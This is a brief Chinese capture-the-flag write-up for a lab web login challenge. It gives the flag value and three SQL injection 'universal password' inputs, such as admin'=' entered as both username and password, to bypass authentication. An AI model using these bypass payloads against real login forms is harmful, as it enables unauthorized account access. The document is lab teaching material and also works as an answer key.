实验吧web之登陆一下好么
flag值:ctf{51d1bf8fb65a8c2406513ee8f52283e7}
解题步骤:
1、看题目提示,说是把所有语句都过滤了,那就不要往注入语句那个地方想了
2、检查网页源代码,没有啥问题,尝试用一下万能密码
一:username:1'='0 password:1'='0
二:username:what'=' password:what'='
三:username:admin'=' password:admin'='
3、拿取flag值,可以通过mysql数据库拿取flag值,自己研究
